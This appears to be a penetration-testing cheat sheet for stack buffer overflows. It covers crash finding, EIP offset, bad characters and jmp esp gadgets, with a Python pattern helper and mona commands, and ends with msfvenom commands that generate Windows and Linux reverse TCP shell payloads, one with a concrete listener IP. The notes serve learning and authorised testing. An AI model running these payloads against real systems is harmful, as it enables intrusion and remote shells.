# Buffer overflows

  1. Search for the buffer overflow vulnerability by determining at what length the program crashes
  2. Find where the instruction pointer is overwritten by sending a non-repeating pattern, then find the offset at which EIP is overwritten
  3. Find the bad characters by sending all possible hex values and looking at the stack to see which characters didn't make it through
  4. Find a register that points somewhere in the stack we can write to
  5. Find an instruction that jumps to that register, e.g. jmp esp
  6. Get that instruction's address and overwrite EIP with it
  7. Put our shellcode at the location the register points to

# Create pattern

msf-pattern_create -l <length>

# Pattern offset finder

msf-pattern_offset -q <pattern_found>
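
To make the two commands above concrete, here is an added Python re-implementation of the pattern and offset logic (example code, not part of the original notes or of Metasploit). It shows why the EIP value read from the debugger has to be byte-reversed before it is searched for in the pattern; the address 0x625011AF in the demo is a constructed value.

```python
import string
import struct
from itertools import product

# Added example (not from the original notes): re-implements the logic of
# msf-pattern_create / msf-pattern_offset to show why the EIP value shown by
# the debugger must be byte-reversed before searching the pattern.

MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes before the triplets would repeat


def pattern_create(length: int) -> bytes:
    """Cyclic pattern Aa0Aa1...Aa9Ab0...: each aligned 3-byte triplet
    (upper, lower, digit) occurs once, so a 4-byte window maps to one offset."""
    out = bytearray()
    for up, low, dig in product(string.ascii_uppercase,
                                string.ascii_lowercase, string.digits):
        out += (up + low + dig).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip, length: int = MAX_PATTERN) -> int:
    """Offset of the 4 bytes that landed in EIP, or -1 if not found.

    `eip` is either the raw bytes as sent, or the register value shown by the
    debugger (e.g. "0x41356141"). x86 is little-endian, so the displayed value
    is the 4 buffer bytes in reverse order; undo that before searching.
    """
    if isinstance(eip, str):
        hexstr = eip[2:] if eip.lower().startswith("0x") else eip
        needle = struct.pack("<I", int(hexstr, 16))  # LE bytes == buffer order
    else:
        needle = bytes(eip)
    return pattern_create(length).find(needle)


def pack_address(addr: int) -> bytes:
    """Pack a jmp esp address as it must appear in the payload (little endian)."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    print(pattern_create(24).decode())     # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    print(pattern_offset("0x41356141"))    # 15
    print(pack_address(0x625011AF).hex())  # af115062 (constructed address)
```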

# Generate assembly instruction opcodes

msf-nasm_shell
nasm > add eax,12
00000000  83C00C            add eax,byte +0xc

# Mona finding jmp esp

First find a module (.dll or .exe) where all the protections such as ASLR show False:

!mona modules

Once the .dll or .exe is found, use mona to find the instruction:

!mona find -s '\xff\xe4' -m programname.exe
!mona jmp -r esp

The results are written to the log window (View > Log, or Alt+L).

or

!mona find -s '\xff\xe4'

Remember to send the address in little endian.

# Bad characters

Be aware that if the overflow depends on an exact length, bad characters that get dropped shorten the payload and the crash may no longer be triggered.

The following omits \x00, \x0a and \x0d:

badchars = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# Shell payloads

# Shikata ga nai

msfvenom -p windows/shell_reverse_tcp LHOST=<listening_host> LPORT=<listening_port> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b <illegal characters as string, e.g. "\x00\x12...">

# Fnstenv mov

msfvenom -p windows/shell_reverse_tcp LHOST=<listening host> LPORT=<listening port> -f c -e x86/fnstenv_mov -b "\x00\x0a\x0d\xff\x3b\x45..."

# Linux reverse tcp shells

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.194 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b <illegal characters as string, e.g. "\x00\x12...">